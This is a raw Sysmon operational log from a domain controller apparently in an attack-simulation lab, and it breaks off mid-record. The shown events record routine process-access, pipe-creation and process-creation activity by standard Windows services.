12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.440{266CAFBE-646C-6064-1000-00000000AE01}1124\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDERC:\Windows\system32\svchost.exe 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.440{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.440{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.440{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.408{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.408{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.408{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.396{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.396{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.385{266CAFBE-647D-6064-2D00-00000000AE01}2364\Amazon\SSM\InstanceData\terminationC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 17141700x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.385{266CAFBE-647D-6064-2D00-00000000AE01}2364\Amazon\SSM\InstanceData\healthC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 17141700x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.384{266CAFBE-647D-6064-2D00-00000000AE01}2364\Amazon\SSM\InstanceData\testPipeC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.376{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.351{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.333{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.333{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.308{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.328{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 